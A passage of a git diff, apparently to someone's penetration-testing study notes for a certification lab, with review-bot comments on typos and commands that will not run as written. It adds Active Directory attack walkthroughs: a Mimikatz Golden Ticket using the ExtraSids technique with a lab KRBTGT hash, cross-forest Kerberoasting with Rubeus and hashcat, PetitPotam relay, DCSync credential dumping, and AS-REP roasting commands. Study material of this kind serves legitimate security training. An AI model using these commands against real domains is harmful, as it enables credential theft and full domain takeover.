+ + +##### Step 5: getting the SID of the Enterprise Admins group of the root domain + +Next, we can use `Get-DomainGroup` from PowerView to obtain the SID for the Enterprise Admins group in the parent domain. + +```powershell +Get-DomainGroup -Domain $domain -Identity "$GroupName" | select distinguishedname,objectsid +# Example: +# Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid +``` + +We could also do this with the [Get-ADGroup](https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps) cmdlet: + +```powershell +Get-ADGroup -Identity "$GroupName" -Server "$DomainServer"` +# Example: +# Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL" +``` + +Results: + +``` +distinguishedname objectsid +----------------- --------- +CN=Enterprise Admins,CN=Users,DC=INLANEFREIGHT,DC=LOCAL S-1-5-21-3842939050-3880317879-2865463114-519 +``` + + +##### Step 6: The attack + +- The KRBTGT hash for the child domain: `9d765b482771505cbe97411065964d5f` +- The SID for the child domain: `S-1-5-21-2806153819-209893948-922872689` +- The name of a target user in the child domain (does not need to exist to create our Golden Ticket!): We'll choose a fake user: `hacker` +- The FQDN of the child domain: `LOGISTICS.INLANEFREIGHT.LOCAL` +- The SID of the Enterprise Admins group of the root domain: `S-1-5-21-3842939050-3880317879-2865463114-519` + +Before the attack, we can confirm no access to the file system of the DC in the parent domain: + +```powershell +# List C: in the parent domain: +ls \\$parenhostname.$domain\c$ +# Example: +# ls \\academy-ea-dc01.inlanefreight.local\c$ +``` + +Using Mimikatz and the data listed above, we can create a Golden Ticket to access all resources within the parent domain. 
+ +```powershell +kerberos::golden /user:$madeupUserName /domain:$targetedFQDN /sid:$sidTargetedDomain /krbtgt:$NTLMhashOfKRBTGTaccountDomain /sids:$SIDofEnterpriseAdminGroup /ptt + +# Example: +# kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt +``` + +Now, let's list the kerberos tickets in memory: + +```powershell +klist +``` + +Now we can perform actions in the parent domain, such as reading a flag: + +```powershell +# List C: in the parent domain: +ls \\$parenhostname.$domain\c$ +# Example: +# ls \\academy-ea-dc01.inlanefreight.local\c$ + +# Read the flag +cat \\$parenhostname.$domain\c$path\to\file.txt +# Example: +# cat \\academy-ea-dc01.inlanefreight.local\c$\ExtraSids\flag.txt +``` + +### Cross-Forest Kerberoasting + + Sometimes you cannot escalate privileges in your current domain, but instead can obtain a Kerberos ticket and crack a hash for an administrative user in another domain that has Domain/Enterprise Admin privileges in both domains. + +#### Enumerating SPNs + +Enumerating Accounts for Associated SPNs Using Get-DomainUser: + +```powershell +Get-DomainUser -SPN -Domain $TargetDomain | select SamAccountName +# Example: +# Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName + +``` + +Results: + +``` +samaccountname +-------------- +krbtgt +mssqlsvc +``` + +There is one account with an SPN in the target domain. + +#### Getting which groups is SPM member of + +A quick check shows that this account is a member of the Domain Admins group in the target domain. 
+ +```powershell +Get-DomainUser -Domain $TargetDomain -Identity $interestingUserSamAccountName | select samaccountname,memberof +# Example: +# Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc | select samaccountname,memberof +``` + + +#### Performing a Kerberoasting Attacking with Rubeus Using /domain Flag + +```powershell +.\Rubeus.exe kerberoast /domain:$TargetDomain /user:$interestingUserSamAccountName /nowrap +# Example: +# .\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap +``` + +When getting the kerberos ticket, we can crack it: + + +```shell-session +hashcat -m 13100 ticketTocrack /usr/share/wordlists/rockyou.txt +# Results: 1logistics +``` + + +### Admin Password Re-Use & Group Membership + +From time to time, we'll run into a situation where there is a bidirectional forest trust managed by admins from the same company. We may see a Domain Admin or Enterprise Admin from Domain A as a member of the built-in Administrators group in Domain B in a bidirectional forest trust relationship. If we can take over this admin user in Domain A, we would gain full administrative access to Domain B based on group membership. + +#### Using Get-DomainForeignGroupMember + +For instance, the `FREIGHTLOGISTICS.LOCAL` domain with which we have an external bidirectional forest trust. 
+ +```powershell +Get-DomainForeignGroupMember -Domain $targeteddomain +# Example: +# Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL +``` + +Results: +``` +GroupDomain : FREIGHTLOGISTICS.LOCAL +GroupName : Administrators +GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=FREIGHTLOGISTICS,DC=LOCAL +MemberDomain : FREIGHTLOGISTICS.LOCAL +MemberName : S-1-5-21-3842939050-3880317879-2865463114-500 +MemberDistinguishedName : CN=S-1-5-21-3842939050-3880317879-2865463114-500,CN=ForeignSecurityPrincipals,DC=FREIGHTLOGIS + TICS,DC=LOCAL +``` + +If we convert the SID to name: +```powershell +Convert-SidToName S-1-5-21-3842939050-3880317879-2865463114-500 +# Results: INLANEFREIGHT\administrator +``` + +Meaning that the built-in Administrators group in `FREIGHTLOGISTICS.LOCAL` has the built-in Administrator account for the `INLANEFREIGHT.LOCAL` domain as a member. + +#### Accessing DC03 Using Enter-PSSession + +```powershell +Enter-PSSession -ComputerName $hostname.$targeteddomain -Credential $ParentDomain\administrator +# Example: +# Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator +# From the command output above, we can see that we successfully authenticated to the Domain Controller in the `FREIGHTLOGISTICS.LOCAL` domain using the Administrator account from the `INLANEFREIGHT.LOCAL` domain + +``` + +### SID History Abuse - Cross Forest + +SID History can also be abused across a forest trust. If a user is migrated from one forest to another and SID Filtering is not enabled, it becomes possible to add a SID from the other forest. + +If the SID of an account with administrative privileges in Forest A is added to the SID history attribute of an account in Forest B, assuming they can authenticate across the forest, then this account will have administrative privileges when accessing resources in the partner forest. + + ## Evasion Techniques #### Downgrade Powershell 
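Review bot: several copy-paste commands in the new ExtraSids section will not run as written. `Get-ADGroup -Identity "$GroupName" -Server "$DomainServer"` is followed by a stray trailing backtick inside the fence; both `ls \\$parenhostname.$domain\c$` blocks misspell the placeholder (`$parenthostname`); and `cat \\$parenhostname.$domain\c$path\to\file.txt` is missing the backslash after `c$` that its own example (`c$\ExtraSids\flag.txt`) uses. The introduction also says the SID of "a Domain Admin account" is injected, while Steps 5 and 6 collect and pass the Enterprise Admins group SID (RID 519) in `/sids:`, which is what makes the ticket honoured in the parent domain; align the intro with the steps. Smaller points: "nugshell" (nutshell), "Getting which groups is SPM member of" (SPN), "Performing a Kerberoasting Attacking" (Attack), and the sentence beginning "From the command output above..." sits inside the Enter-PSSession code fence and belongs in the prose after it.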
diff --git a/docs/active-directory-security-identifiers.md b/docs/active-directory-security-identifiers.md new file mode 100644 index 000000000..495d4e5ca --- /dev/null +++ b/docs/active-directory-security-identifiers.md 
@@ -0,0 +1,215 @@ +--- +title: Interesting Windows Computer & Active Directory Well-Known Security Identifiers - SIDs +author: amandaguglieri +draft: false +TableOfContents: true +tags: + - active + - directory +--- +# Interesting Windows Computer & Active Directory Well-Known Security Identifiers (SIDs) +Source: [https://adsecurity.org/?p=1001](https://adsecurity.org/?p=1001) + +##### The [Microsoft Knowledge Base article KB243330 lists the well-known security identifiers in Windows operating systems](http://support.microsoft.com/KB/243330)  + +Listed here are the more interesting ones from the article as well as some additional ones. + +#### **Local Computer SIDs +** + +> SID: S-1-5-2 +> Name: Network +> Description: A group that includes all users that have logged on through a network connection. Membership is controlled by the operating system. +> +> SID: S-1-5-6 +> Name: Service +> Description: A group that includes all security principals that have logged on as a service. Membership is controlled by the operating system. +> +> SID: S-1-5-9 +> Name: Enterprise Domain Controllers +> Description: A group that includes all domain controllers in a forest that uses an Active Directory directory service. Membership is controlled by the operating system. +> +> SID: S-1-5-11 +> Name: Authenticated Users +> Description: A group that includes all users whose identities were authenticated when they logged on. Membership is controlled by the operating system. +> +> SID: S-1-5-18 +> Name: Local System +> Description: A service account that is used by the operating system. 
+> +> SID: S-1-5-19 +> Name: NT Authority +> Description: Local Service +> +> SID: S-1-5-20 +> Name: NT Authority +> Description: Network Service + +#### **New Local Computer SIDs in Windows 8.1, Windows 2012 R2, and earlier operating systems ([with KB2871997](https://adsecurity.org/?p=559 "Microsoft KB2871997: Back-Porting Windows 8.1/Win2012R2 Enhanced Security & Pass The Hash Mitigation to Windows 7, Windows 8, & Windows 2008R2")):** + +> LOCAL_ACCOUNT (S-1-5-113) – any local account +> LOCAL_ACCOUNT_AND_MEMBER_OF_ADMINISTRATORS_GROUP (S-1-5-114) + +#### **Active Directory Domain SIDs’ + +** + +> SID: S-1-5-21-500 +> Name: Administrator +> Description: A user account for the system administrator. By default, it is the only user account that is given full control over the system. +> +> SID: S-1-5-21-501 +> Name: Guest +> Description: A user account for people who do not have individual accounts. This user account does not require a password. By default, the Guest account is disabled. +> +> SID: S-1-5-21-502 +> Name: KRBTGT +> Description: A service account that is used by the Key Distribution Center (KDC) service. +> +> SID: S-1-5-21-512 +> Name: Domain Admins +> Description: A global group whose members are authorized to administer the domain. By default, the Domain Admins group is a member of the Administrators group on all computers that have joined a domain, including the domain controllers. Domain Admins is the default owner of any object that is created by any member of the group. +> +> SID: S-1-5-21-513 +> Name: Domain Users +> Description: A global group that, by default, includes all user accounts in a domain. When you create a user account in a domain, it is added to this group by default. +> +> SID: S-1-5-21-514 +> Name: Domain Guests +> Description: A global group that, by default, has only one member, the domain’s built-in Guest account. 
+> +> SID: S-1-5-21-515 +> Name: Domain Computers +> Description: A global group that includes all clients and servers that have joined the domain. +> +> SID: S-1-5-21-516 +> Name: Domain Controllers +> Description: A global group that includes all domain controllers in the domain. New domain controllers are added to this group by default. +> +> SID: S-1-5- 21-498 +> Name: Enterprise Read-only Domain Controllers +> Description: A Universal group. Members of this group are Read-Only Domain Controllers in the enterprise +> _New with Windows Server 2008 Active Directory schema (or newer)_ +> +> SID: S-1-5- 21-521 +> Name: Read-only Domain Controllers +> Description: A Global group. Members of this group are Read-Only Domain Controllers in the domain +> _New with Windows Server 2008 Active Directory schema (or newer)_ +> +> SID: S-1-5-21-517 +> Name: Cert Publishers +> Description: A global group that includes all computers that are running an enterprise certification authority. Cert Publishers are authorized to publish certificates for User objects in Active Directory. +> +> SID: S-1-5-21-518 +> Name: Schema Admins +> Description: A universal group in a native-mode domain; a global group in a mixed-mode domain. The group is authorized to make schema changes in Active Directory. By default, the only member of the group is the Administrator account for the forest root domain. +> +> SID: S-1-5-21-519 +> Name: Enterprise Admins +> Description: A universal group in a native-mode domain; a global group in a mixed-mode domain. The group is authorized to make forest-wide changes in Active Directory, such as adding child domains. By default, the only member of the group is the Administrator account for the forest root domain. +> +> SID: S-1-5-21-520 +> Name: Group Policy Creator Owners +> Description: A global group that is authorized to create new Group Policy objects in Active Directory. By default, the only member of the group is Administrator. 
+> +> SID: S-1-5-32-544 +> Name: Administrators +> Description: A built-in group. After the initial installation of the operating system, the only member of the group is the Administrator account. When a computer joins a domain, the Domain Admins group is added to the Administrators group. When a server becomes a domain controller, the Enterprise Admins group also is added to the Administrators group. +> +> SID: S-1-5-32-545 +> Name: Users +> Description: A built-in group. After the initial installation of the operating system, the only member is the Authenticated Users group. When a computer joins a domain, the Domain Users group is added to the Users group on the computer. +> +> SID: S-1-5-32-546 +> Name: Guests +> Description: A built-in group. By default, the only member is the Guest account. The Guests group allows occasional or one-time users to log on with limited privileges to a computer’s built-in Guest account. +> +> SID: S-1-5-32-548 +> Name: Account Operators +> Description: A built-in group that exists only on domain controllers. By default, the group has no members. By default, Account Operators have permission to create, modify, and delete accounts for users, groups, and computers in all containers and organizational units of Active Directory except the Builtin container and the Domain Controllers OU. Account Operators do not have permission to modify the Administrators and Domain Admins groups, nor do they have permission to modify the accounts for members of those groups. +> +> SID: S-1-5-32-549 +> Name: Server Operators +> Description: A built-in group that exists only on domain controllers. By default, the group has no members. Server Operators can log on to a server interactively; create and delete network shares; start and stop services; back up and restore files; format the hard disk of the computer; and shut down the computer. 
+> +> SID: S-1-5-32-550 +> Name: Print Operators +> Description: A built-in group that exists only on domain controllers. By default, the only member is the Domain Users group. Print Operators can manage printers and document queues. +> +> SID: S-1-5-32-551 +> Name: Backup Operators +> Description: A built-in group. By default, the group has no members. Backup Operators can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to the computer and shut it down. +> +> SID: S-1-5-32-552 +> Name: Replicators +> Description: A built-in group that is used by the File Replication service on domain controllers. By default, the group has no members. Do not add users to this group +> +> SID: S-1-5-32-557 +> Name: BUILTIN\Incoming Forest Trust Builders +> Description: An alias. Members of this group can create incoming, one-way trusts to this forest. +> +> SID: S-1-5-32-569 +> Name: BUILTIN\Cryptographic Operators +> Description: A Builtin Local group. Members are authorized to perform cryptographic operations. +> _New with Windows Server 2008 Active Directory schema (or newer)_ +> +> SID: S-1-5-21-571 +> Name: Allowed RODC Password Replication Group +> Description: A Domain Local group. Members in this group can have their passwords replicated to all read-only domain controllers in the domain. +> _New with Windows Server 2008 Active Directory schema (or newer)_ +> +> SID: S-1-5-21-572 +> Name: Denied RODC Password Replication Group +> Description: A Domain Local group. Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain +> _New with Windows Server 2008 Active Directory schema (or newer)_ +> +> SID: S-1-5-32-573 +> Name: BUILTIN\Event Log Readers +> Description: A Builtin Local group. Members of this group can read event logs from local machine. 
+> _New with Windows Server 2008 Active Directory schema (or newer)_ +> +> SID: S-1-5-32-574 +> Name: BUILTIN\Certificate Service DCOM Access +> Description: A Builtin Local group. Members of this group are allowed to connect to Certification Authorities in the enterprise. +> _New with Windows Server 2008 Active Directory schema (or newer)_ +> +> SID: S-1-5-21-–522 +> Name: Cloneable Domain Controllers +> Description: A Global group. Members of this group that are domain controllers may be cloned. +> _New with Windows Server 2012 Active Directory schema (or newer)_ +> +> SID: S-1-5-32-578 +> Name: BUILTIN\Hyper-V Administrators +> Description: A Builtin Local group. Members of this group have complete and unrestricted access to all features of Hyper-V. +> _New with Windows Server 2012 Active Directory schema (or newer)_ +> +> SID: S-1-5-32-579 +> Name: BUILTIN\Access Control Assistance Operators +> Description: A Builtin Local group. Members of this group can remotely query authorization attributes and permissions for resources on this computer. +> _New with Windows Server 2012 Active Directory schema (or newer)_ +> +> SID: S-1-5-32-580 +> Name: BUILTIN\Remote Management Users +> Description: A Builtin Local group. Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user. +> _New with Windows Server 2012 Active Directory schema (or newer)_ +> +> SID: S-1-5-64-10 +> Name: NTLM Authentication +> Description: A SID that is used when the NTLM authentication package authenticated the client +> +> SID: S-1-5-64-14 +> Name: SChannel Authentication +> Description: A SID that is used when the SChannel authentication package authenticated the client. +> +> SID: S-1-5-64-21 +> Name: Digest Authentication +> Description: A SID that is used when the Digest authentication package authenticated the client. 
+> +> SID: S-1-5-80 +> Name: NT Service +> Description: An NT Service account prefix +> +> SID: S-1-5-80-0 +> NT SERVICES\ALL SERVICES +> Name: All Services +> Description: A group that includes all service processes that are configured on the system. Membership is controlled by the operating system. \ No newline at end of file diff --git a/docs/active-directory.md b/docs/active-directory.md index b7e0b399c..e8fed81a9 100644 --- a/docs/active-directory.md +++ b/docs/active-directory.md 
@@ -108,3 +108,33 @@ tags: |[ADRecon](https://github.com/adrecon/ADRecon)|A tool used to extract various data from a target AD environment. The data can be output in Microsoft Excel format with summary views and analysis to assist with analysis and paint a picture of the environment's overall security state.| +## Domain Trust Overview + +A trust creates a link between the authentication systems of two domains and may allow either one-way or two-way (bidirectional) communication. + +Types of trusts: + +- `Parent-child`: Two or more domains within the same forest. The child domain has a two-way transitive trust with the parent domain, meaning that users in the child domain `corp.inlanefreight.local` could authenticate into the parent domain `inlanefreight.local`, and vice-versa. +- `Cross-link`: A trust between child domains to speed up authentication. +- `External`: A non-transitive trust between two separate domains in separate forests which are not already joined by a forest trust. This type of trust utilizes [SID filtering](https://www.serverbrain.org/active-directory-2008/sid-history-and-sid-filtering.html) or filters out authentication requests (by SID) not from the trusted domain. +- `Tree-root`: A two-way transitive trust between a forest root domain and a new tree root domain. They are created by design when you set up a new tree root domain within a forest. +- `Forest`: A transitive trust between two forest root domains. +- [ESAE](https://docs.microsoft.com/en-us/security/compass/esae-retirement): A bastion forest used to manage Active Directory. + + +Trusts can be transitive or non-transitive: + +- A `transitive` trust means that trust is extended to objects that the child domain trusts: + - Shared, 1 to many. + - The trust is shared with anyone in the forest. + - Forest, tree-root, parent-child, and cross-link trusts are transitive. +- In a non-transitive trust, the child domain itself is the only one trusted: + - Direct trust. 
+ - Not extended to the next level child domains. + - Typical for external or custom trust setup. + + +Trusts can be set up in two directions: one-way or two-way (bidirectional): + +- - `One-way trust`: Users in a `trusted` domain can access resources in a trusting domain, not vice-versa. +- `Bidirectional trust`: Users from both trusting domains can access resources in the other domain. diff --git a/docs/activedirectory-powershell-module.md b/docs/activedirectory-powershell-module.md index 2841c22a1..b903e7ab6 100644 --- a/docs/activedirectory-powershell-module.md +++ b/docs/activedirectory-powershell-module.md @@ -20,9 +20,13 @@ The Active Directory module for Windows PowerShell is a PowerShell module that c Download from [The ActiveDirectory PowerShell module github repository](https://github.com/samratashok/ADModule ) +```powershell +Import-Module activedirectory +``` + This module is Microsoft signed and works even in PowerShell Constrained Language Mode (CLM). -```ps +```powershell Import-Module .\ADModule-master\Microsoft.ActiveDirectory.Management.dll  Import-Module .\ADModule-master\ActiveDirectory\ActiveDirectory.psd1  @@ -30,11 +34,13 @@ Import-Module .\ADModule-master\ActiveDirectory\ActiveDirectory.psd1  Also, you can copy the DLL from the github repo to your machine and use it to enumerate Active Directory without installing RSAT and without having administrative privileges. -```ps +```powershell Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll -Verbose ``` + + ## Basic commands ```powershell diff --git a/docs/bloodhound.md b/docs/bloodhound.md index c32947257..fd69dc748 100644 --- a/docs/bloodhound.md +++ b/docs/bloodhound.md @@ -108,3 +108,9 @@ Enumerate via Bloodhound and the `SQLAdmin` edge. We can check for `SQL Admin ```cypher MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2 ``` + + +### Visualizing Trust Relationships in BloodHound + +![](img/blood02.png) + 
diff --git a/docs/cpts-cheat-sheet.md b/docs/cpts-cheat-sheet.md index 206592391..ddb360be0 100644 --- a/docs/cpts-cheat-sheet.md +++ b/docs/cpts-cheat-sheet.md 
@@ -1193,18 +1193,18 @@ By leveraging the Wayback Machine, you can gain a historical perspective on your ### PetitPotam -|Command|Description| -|---|---| -|`sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController`|Impacket tool used to create an `NTLM relay` by specifiying the web enrollment URL for the `Certificate Authority` host. Perfomred from a Linux-based host.| -|`git clone https://github.com/topotam/PetitPotam.git`|Used to clone the `PetitPotam` exploit using git. Performed from a Linux-based host.| -|`python3 PetitPotam.py 172.16.5.225 172.16.5.5`|Used to execute the PetitPotam exploit by specifying the IP address of the attack host (`172.16.5.255`) and the target Domain Controller (`172.16.5.5`). Performed from a Linux-based host.| -|`python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 = dc01.ccache`|Uses `gettgtpkinit`.py to request a TGT ticket for the Domain Controller (`dc01.ccache`) from a Linux-based host.| -|`secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL`|Impacket tool used to perform a DCSync attack and retrieve one or all of the `NTLM password hashes` from the target Windows domain. Performed from a Linux-based host.| -|`klist`|`krb5-user` command used to view the contents of the `ccache` file. Performed from a Linux-based host.| -|`python /opt/PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$`|Used to submit TGS requests using `getnthash.py` from a Linux-based host.| -|`secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba`|Impacket tool used to extract hashes from `NTDS.dit` using a `DCSync attack` and a captured hash (`-hashes`). 
Performed from a Linux-based host.| -|`.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /=/ptt`|Uses Rubeus to request a TGT and perform a `pass-the-ticket attack` using the machine account (`/user:ACADEMY-EA-DC01$`) of a Windows target. Performed from a Windows-based host.| -|`mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt`|Performs a DCSync attack using `Mimikatz`. Performed from a Windows-based host.| +| Command | Description | +| ------------------------------------------------------------------------------------------------------------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | +| `sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController` | Impacket tool used to create an `NTLM relay` by specifiying the web enrollment URL for the `Certificate Authority` host. Perfomred from a Linux-based host. | +| `git clone https://github.com/topotam/PetitPotam.git` | Used to clone the `PetitPotam` exploit using git. Performed from a Linux-based host. | +| `python3 PetitPotam.py 172.16.5.225 172.16.5.5` | Used to execute the PetitPotam exploit by specifying the IP address of the attack host (`172.16.5.255`) and the target Domain Controller (`172.16.5.5`). Performed from a Linux-based host. | +| `python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 = dc01.ccache` | Uses `gettgtpkinit`.py to request a TGT ticket for the Domain Controller (`dc01.ccache`) from a Linux-based host. | +| `secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL` | Impacket tool used to perform a DCSync attack and retrieve one or all of the `NTLM password hashes` from the target Windows domain. 
Performed from a Linux-based host. | +| `klist` | `krb5-user` command used to view the contents of the `ccache` file. Performed from a Linux-based host. | +| `python /opt/PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$` | Used to submit TGS requests using `getnthash.py` from a Linux-based host. | +| `secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba` | Impacket tool used to extract hashes from `NTDS.dit` using a `DCSync attack` and a captured hash (`-hashes`). Performed from a Linux-based host. | +| `.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /=/ptt` | Uses Rubeus to request a TGT and perform a `pass-the-ticket attack` using the machine account (`/user:ACADEMY-EA-DC01$`) of a Windows target. Performed from a Windows-based host. | +| `mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt` | Performs a DCSync attack using `Mimikatz`. Performed from a Windows-based host. | ### Miscellaneous Misconfigurations 
@@ -1233,12 +1233,12 @@ By leveraging the Wayback Machine, you can gain a historical perspective on your ### ASREPRoasting -|Command|Description| -|---|---| -|`Get-DomainUser -PreauthNotRequired \| select samaccountname,userprincipalname,useraccountcontrol \| fl`|PowerView based tool used to search for the `DONT_REQ_PREAUTH` value across in user accounts in a target Windows domain. Performed from a Windows-based host.| -|`.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat`|Uses `Rubeus` to perform an `ASEP Roasting attack` and formats the output for `Hashcat`. Performed from a Windows-based host.| -|`hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt`|Uses `Hashcat` to attempt to crack the captured hash using a wordlist (`rockyou.txt`). Performed from a Linux-based host.| -|`kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt`|Enumerates users in a target Windows domain and automatically retrieves the `AS` for any users found that don't require Kerberos pre-authentication. Performed from a Linux-based host.| +| Command | Description | +| -------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | +| `Get-DomainUser -PreauthNotRequired \| select samaccountname,userprincipalname,useraccountcontrol \| fl` | PowerView based tool used to search for the `DONT_REQ_PREAUTH` value across in user accounts in a target Windows domain. Performed from a Windows-based host. | +| `.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat` | Uses `Rubeus` to perform an `ASEP Roasting attack` and formats the output for `Hashcat`. Performed from a Windows-based host. 
| +| `hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt` | Uses `Hashcat` to attempt to crack the captured hash using a wordlist (`rockyou.txt`). Performed from a Linux-based host. | +| `kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt` | Enumerates users in a target Windows domain and automatically retrieves the `AS` for any users found that don't require Kerberos pre-authentication. Performed from a Linux-based host. | ### Trust Relationships - Child > Parent Trusts diff --git a/docs/cpts-index.md b/docs/cpts-index.md index 0c20ea653..3a5147b18 100644 --- a/docs/cpts-index.md +++ b/docs/cpts-index.md 
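Review bot: The ASREPRoasting rows still read `across in user accounts` (drop `in`), `ASEP Roasting attack` (should match the section title, AS-REP Roasting), and in the kerbrute row `retrieves the \`AS\``, which is an incomplete abbreviation; writing AS-REP there keeps the term consistent with the heading and the Rubeus row. All three are worth fixing in the same pass, as the hunk already rewrites every line of the table.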
@@ -9,35 +9,35 @@ tags: # CPTS -| Number | Module | My notes | Duration | | | -| ------ | ---------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --- | -| 01 | Penetration Testing Process | [Penetration Testing Process](penetration-testing-process.md) | 6 hours | Introduction | | -| 02 | Network Enumeration with Nmap | [(Almost) all about nmap](nmap.md) | 7 hours | Reconnaissance, Enumeration & Attack Planning | | -| 03 | Footprinting | [Introduction to footprinting](footprinting.md)
[Infrastructure and web enumeration](information-gathering.md)
Some services: [FTP](21-ftp.md), [SMB](137-138-139-445-smb.md), [NFS](2049-nfs-network-file-system.md), [DNS](53-dns.md), [SMTP](25-565-587-simple-mail-tranfer-protocol-smtp.md), [IMAP/POP3](110-143-993-995-imap-pop3.md),[SNMP](161-162-snmp.md), [MySQL](3306-mariadb-mysql.md), [Oracle TNS](1521-oracle-transparent-network-substrate.md), [IPMI](623-1900-intelligent-platform-management-interface-ipmi.md), [SSH](22-ssh.md), [RSYNC](873-rsync.md), [R Services](512-513-514-remote-services.md), [RDP](3389-rdp.md), [WinRM](5985-5986-winrm-windows-remote-management.md), [WMI](135-windows-management-instrumentation-wmi.md) | 2 days | Reconnaissance, Enumeration & Attack Planning | | -| 04 | Information Gathering - Web Edition | [Information Gathering - Web Edition](information-gathering.md). With tools such as [Gobuster](gobuster.md), [ffuf](ffuf.md), [Burpsuite](burpsuite.md), [Wfuzz](wfuzz.md), [feroxbuster](feroxbuster.md), [OWASP WSTG-INFO-02](OWASP/WSTG-INFO-03.md), [OWASP WSTG-INFO-02](OWASP/WSTG-INFO-03.md), [Google Dorks](google-dorks.md) More tools for recon: [finalrecon](finalrecon.md) | 7 hours | Reconnaissance, Enumeration & Attack Planning | | -| 05 | Vulnerability Assessment | [Vulnerability Assessment](vulnerability-assessment.md):
[Nessus](nessus.md), [Openvas](openvas.md) | 2 hours | Reconnaissance, Enumeration & Attack Planning | | -| 06 | File Transfer techniques | File Transfer Techniques:
[Linux](transferring-files-techniques-linux.md), [Windows](transferring-files-techniques-windows.md), [Code- netcat python php and others](transferring-files-techniques-code.md), [Bypassing file upload restrictions](webexploitation/arbitrary-file-upload.md), [File encryption](file-encryption.md), [Evading techniques when transferring files](transferring-files-evading-detection.md), [LOLbas Living off the land binaries](lolbins-lolbas-gtfobins.md) | 3 hours | Reconnaissance, Enumeration & Attack Planning | | -| 07 | Shells & Payloads | [Bind shells](bind-shells.md), [Reverse shells](reverse-shells.md), [Spawn a shell](spawn-a-shell.md), [Web shells](web-shells.md) ([Laudanum](laudanum.md) and [nishang](nishang.md)), [Windows footprinting](windows-footprinting.md), | 2 days | Reconnaissance, Enumeration & Attack Planning | | -| 08 | Using the Metasploit Framework | [Metasploit](metasploit.md), [Msfvenom](msfvenom.md) | 5 hours | Reconnaissance, Enumeration & Attack Planning | | -| 09 | Password Attacks | [Password attacks](webexploitation/password-attacks.md) | 8 hours | Exploitation & Lateral Movement | | -| 10 | Attacking Common Services | Common services: [FTP](21-ftp.md)
[SMB](137-138-139-445-smb.md) (tools: [smbclient](smbclient.md), [smbmap](smbmap.md), [rpcclient](rpcclient.md), [Samba Suite](samba-suite.md), [crackmapexec](crackmapexec.md), [impacket-smbexec](impacket-smbexec.md), [impacket-psexec](impacket-psexec.md)), Databases ([MySQL](mysql.md) and [Attacking MySQL](3306-mariadb-mysql.md), [MSSQL](mssql.md) and [Atacking MSSQL](1433-mssql.md), [log4j](log4j.md), [RDP](3389-rdp.md), [DNS](53-dns.md), [SMTP](25-565-587-simple-mail-tranfer-protocol-smtp.md), [IMAP/POP protocols](110-143-993-995-imap-pop3.md), [postfix](postfix.md), [swaks](swaks.md)
